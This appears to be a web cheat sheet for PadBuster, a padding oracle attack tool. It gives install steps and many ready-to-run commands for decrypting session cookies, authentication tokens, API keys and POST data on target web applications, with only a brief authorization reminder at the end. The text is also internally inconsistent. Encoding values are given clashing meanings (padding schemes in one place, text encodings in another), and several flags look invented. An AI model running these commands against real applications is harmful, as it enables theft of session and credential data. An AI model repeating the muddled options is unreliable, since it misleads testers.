Skip to content
1337skills 1337skills

PadBuster

PadBuster is an automated padding oracle attack tool designed to exploit padding oracle vulnerabilities in applications using CBC-mode encryption. It demonstrates how flawed error handling can leak information about encrypted data through timing and error messages, allowing attackers to decrypt ciphertext without knowing the encryption key.

Installation

Section titled “Installation”

Linux Installation

Section titled “Linux Installation”
# Install Perl (PadBuster requirement)
sudo apt-get install perl libwww-perl

# Download PadBuster
wget http://www.gdssecurity.com/l/tools/padbuster/padbuster.pl

# Set execute permissions
chmod +x padbuster.pl

# Verify installation
perl padbuster.pl

macOS Installation

Section titled “macOS Installation”
# Ensure Perl is installed
perl -v

# Install required Perl modules
cpan install LWP::UserAgent
cpan install HTTP::Cookies

# Download PadBuster
curl -O http://www.gdssecurity.com/l/tools/padbuster/padbuster.pl
chmod +x padbuster.pl

Perl Module Dependencies

Section titled “Perl Module Dependencies”
# Install required modules
cpan install LWP::UserAgent
cpan install HTTP::Cookies
cpan install URI::URL

# Or via CPAN batch
perl -MCPAN -e 'install "LWP::UserAgent"'
perl -MCPAN -e 'install "HTTP::Cookies"'

Core Concepts

Section titled “Core Concepts”

Padding Oracle Vulnerability

Section titled “Padding Oracle Vulnerability”

A padding oracle occurs when an application:

  • Encrypts data using CBC-mode cipher
  • Returns different error messages for valid vs. invalid padding
  • Allows attackers to observe these differences (timing or response)
  • Creates an information leak exploitable for decryption

Attack Mechanics

Section titled “Attack Mechanics”
  • Attacker observes valid vs. invalid padding responses
  • Systematically modifies ciphertext bytes
  • Observes oracle feedback to deduce plaintext
  • Decrypts one block at a time
  • Requires no key knowledge

Assumptions

Section titled “Assumptions”
  • Application reveals padding validity through errors or timing
  • CBC-mode encryption is used
  • Attacker can submit arbitrary ciphertexts
  • Response differences are observable and consistent

Basic Usage

Section titled “Basic Usage”

Simple Padding Oracle Attack

Section titled “Simple Padding Oracle Attack”
# Basic attack on encrypted cookie
perl padbuster.pl \
  http://target.example.com/ \
  6E7CB7C98FDB35A02ABD3D30E3A9B4B8 \
  8 \
  -cookies "AUTH=ABCD1234"

# Explain parameters
# URL: target application
# Ciphertext: encrypted data to decrypt
# Block size: cipher block size (8 for DES, 16 for AES)
# -cookies: include cookies in requests

Specify Proxy and User Agent

Section titled “Specify Proxy and User Agent”
perl padbuster.pl \
  http://target.example.com/app \
  encrypted_cookie_value \
  16 \
  -proxy http://127.0.0.1:8080 \
  -user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

Verbose Output

Section titled “Verbose Output”
# Maximum verbosity
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext_value \
  16 \
  -verbose

# Debug mode
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext_value \
  16 \
  -debug

Target Identification

Section titled “Target Identification”

Identify Vulnerable Parameters

Section titled “Identify Vulnerable Parameters”
# Test cookie-based encryption
perl padbuster.pl \
  http://target.example.com/ \
  cookie_ciphertext \
  16 \
  -cookies "SESSION=ABC123"

# Test URL parameter encryption
perl padbuster.pl \
  http://target.example.com/view?data=ciphertext \
  ciphertext \
  16 \
  -parameter data

Determine Block Size

Section titled “Determine Block Size”
# Manual block size detection
perl padbuster.pl \
  http://target.example.com/ \
  encrypted_data \
  8 \
  -test

# Try common block sizes: 8 (DES), 16 (AES), 24 (3DES)
perl padbuster.pl http://target.example.com/ data 8 -test
perl padbuster.pl http://target.example.com/ data 16 -test

Identify Padding Scheme

Section titled “Identify Padding Scheme”
# Standard PKCS#7 padding (default)
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16

# PKCS#5 padding
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -encoding 0

# NULL padding
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -encoding 2

Attack Execution

Section titled “Attack Execution”
Section titled “Attack Encrypted Cookie”
# Decrypt session cookie
perl padbuster.pl \
  http://target.example.com/ \
  F8A3B6E2C91D4F7A8E2B5C9A1D4F7E2B \
  16 \
  -cookies "SESSION=F8A3B6E2C91D4F7A8E2B5C9A1D4F7E2B" \
  -encoding 1

# Specify only target parameter
perl padbuster.pl \
  http://target.example.com/ \
  encrypted_value \
  16 \
  -cookies "AUTH=ABC;ID=12345" \
  -parameter-cookie AUTH

Attack Query Parameters

Section titled “Attack Query Parameters”
# Decrypt URL parameter
perl padbuster.pl \
  http://target.example.com/app?id=ABCD1234&user=encrypted_here \
  encrypted_value \
  16 \
  -parameter user

# Multiple parameters
perl padbuster.pl \
  http://target.example.com/app?data=value \
  value \
  16 \
  -parameter data \
  -url "http://target.example.com/app?data=[PLACEHOLDER]"

Attack POST Data

Section titled “Attack POST Data”
# Decrypt POST body parameter
perl padbuster.pl \
  http://target.example.com/submit \
  encrypted_value \
  16 \
  -method POST \
  -parameter payload

# Custom POST data
perl padbuster.pl \
  http://target.example.com/login \
  encrypted_credentials \
  16 \
  -method POST \
  -data "username=admin&encrypted=VALUE" \
  -parameter encrypted

Advanced Options

Section titled “Advanced Options”

Custom Encoding

Section titled “Custom Encoding”
# Hex encoding (default)
perl padbuster.pl \
  http://target.example.com/ \
  hex_ciphertext \
  16 \
  -encoding 1

# Base64 encoding
perl padbuster.pl \
  http://target.example.com/ \
  base64_ciphertext \
  16 \
  -encoding 0

# URL encoding
perl padbuster.pl \
  http://target.example.com/ \
  url_encoded_ciphertext \
  16 \
  -encoding 2

Response Analysis

Section titled “Response Analysis”
# Look for specific error string
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -error "Invalid Padding" \
  -noerror

# Response length analysis
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -error "Decryption Failed"

# Response time analysis
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -timing

Proxy Configuration

Section titled “Proxy Configuration”
# Burp Suite proxy
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -proxy http://127.0.0.1:8080 \
  -proxycreds username:password

# SOCKS proxy
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -proxy socks5://127.0.0.1:9050

Custom Headers

Section titled “Custom Headers”
# Add authorization header
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -header "Authorization: Bearer token123"

# Multiple headers
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -header "Authorization: Bearer token" \
  -header "X-Custom-Header: value"

Decryption Workflow

Section titled “Decryption Workflow”

Stage 1: Determine Block Size

Section titled “Stage 1: Determine Block Size”
# Send increasingly longer plaintexts
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  8 \
  -test  # Try block size 8 first

# If fails, try:
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -test  # Try block size 16 (AES)

Stage 2: Identify Padding Error

Section titled “Stage 2: Identify Padding Error”
# Request should produce padding error
perl padbuster.pl \
  http://target.example.com/ \
  corrupted_ciphertext \
  16 \
  -error "Invalid Padding" \
  -noerror

Stage 3: Execute Attack

Section titled “Stage 3: Execute Attack”
# Run full decryption
perl padbuster.pl \
  http://target.example.com/ \
  full_ciphertext \
  16 \
  -cookies "SESSION=full_ciphertext" \
  -verbose

# Output shows decrypted plaintext block by block

Plaintext Recovery

Section titled “Plaintext Recovery”

Decrypt Entire Message

Section titled “Decrypt Entire Message”
# Attack multiple blocks
perl padbuster.pl \
  http://target.example.com/ \
  8A9B2C4D6E8F1A3C5E7F9A1B3D5E7F8A \
  16 \
  -cookies "DATA=8A9B2C4D6E8F1A3C5E7F9A1B3D5E7F8A"

# Automatically decrypts all blocks
# Outputs: Block 1: ... Block 2: ...

Save Decrypted Data

Section titled “Save Decrypted Data”
# Redirect output to file
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -cookies "AUTH=ciphertext" 2>&1 | tee decrypted.txt

# Parse specific blocks
grep "Block " decrypted.txt | cut -d: -f2

Plaintext Analysis

Section titled “Plaintext Analysis”
# Look for structure
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 | grep -E "(Block|admin|user|id)"

# Hex to ASCII conversion
perl padbuster.pl ... | xxd -r -p

Encryption Oracle Bypass

Section titled “Encryption Oracle Bypass”

Test Oracle Responses

Section titled “Test Oracle Responses”
# Send crafted ciphertext
perl padbuster.pl \
  http://target.example.com/ \
  test_ciphertext \
  16 \
  -test \
  -verbose

# Observe response patterns
# Success: application processes request
# Failure: padding error message

Modify Ciphertext Bytes

Section titled “Modify Ciphertext Bytes”
# Exploit byte-by-byte feedback
perl padbuster.pl \
  http://target.example.com/ \
  original_ct \
  16 \
  -cookie "ENCRYPTED=original_ct" \
  -verbose

# Attack modifies ciphertext systematically
# Oracle responses reveal plaintext bytes

Attack Scenarios

Section titled “Attack Scenarios”

Decrypt Session Cookies

Section titled “Decrypt Session Cookies”
# Typical web application attack
perl padbuster.pl \
  http://vulnerable.app/dashboard \
  9B2F5A8E3D7C1B6F4E9A2D5B8F1C3E7A \
  16 \
  -cookies "PHPSESSID=9B2F5A8E3D7C1B6F4E9A2D5B8F1C3E7A" \
  -encoding 1 \
  -verbose

# Output reveals session data structure
# May contain user ID, role, timestamp

Decrypt Authentication Tokens

Section titled “Decrypt Authentication Tokens”
# JWT or custom token in cookie
perl padbuster.pl \
  http://target.example.com/ \
  encrypted_token \
  16 \
  -cookies "TOKEN=encrypted_token" \
  -parameter-cookie TOKEN

# Reveals token structure and values
# May expose user privileges, identity

Decrypt Configuration Data

Section titled “Decrypt Configuration Data”
# API key or secret in parameter
perl padbuster.pl \
  http://api.example.com/config \
  encrypted_key \
  16 \
  -parameter apikey \
  -method GET \
  -url "http://api.example.com/config?apikey=[PLACEHOLDER]"

Troubleshooting

Section titled “Troubleshooting”

No Successful Decryption

Section titled “No Successful Decryption”
# Verify correct ciphertext format
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -test \
  -verbose

# Check block size
for size in 8 16 24 32; do
  perl padbuster.pl http://target.example.com/ ct $size -test 2>/dev/null && echo "Size: $size"
done

Padding Error Not Detected

Section titled “Padding Error Not Detected”
# Specify custom error message
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -error "Decryption" \
  -noerror

# Try timing-based detection
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -timing

Connection Issues

Section titled “Connection Issues”
# Use proxy for debugging
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -proxy http://127.0.0.1:8080 \
  -verbose

# Verify URL is correct
perl padbuster.pl \
  http://target.example.com/vulnerable \
  ciphertext \
  16 \
  -test

Best Practices

Section titled “Best Practices”

Pre-Attack Assessment

Section titled “Pre-Attack Assessment”
  • Verify authorization for testing
  • Identify all encrypted parameters
  • Document baseline encryption behavior
  • Test on non-critical data first
  • Establish scope boundaries

Safe Testing

Section titled “Safe Testing”
# Test on controlled application instance
perl padbuster.pl \
  http://test-server.internal/ \
  test_ciphertext \
  16 \
  -test \
  -verbose

# Verify behavior matches production
# Document all assumptions about oracle

Mitigation Verification

Section titled “Mitigation Verification”
# After patching, verify attack fails
perl padbuster.pl \
  http://target.example.com/ \
  test_ciphertext \
  16 \
  -test

# Should show no valid decryption path
# Confirms padding oracle is closed
Section titled “Legal and Ethical Considerations”

PadBuster should only be used:

  • On systems you own or have written authorization to test
  • In authorized penetration testing engagements
  • For security research and education
  • In compliance with applicable laws
  • Within clearly defined scope

Always maintain:

  • Written authorization documentation
  • Detailed records of testing activities
  • Proper handling of decrypted sensitive data
  • Professional ethical standards
  • Confidentiality of findings

Resources

Section titled “Resources”
  • Official PadBuster page
  • Padding oracle exploitation guides
  • CBC-mode cipher vulnerability research
  • OWASP cryptography guidelines
  • Academic papers on padding oracles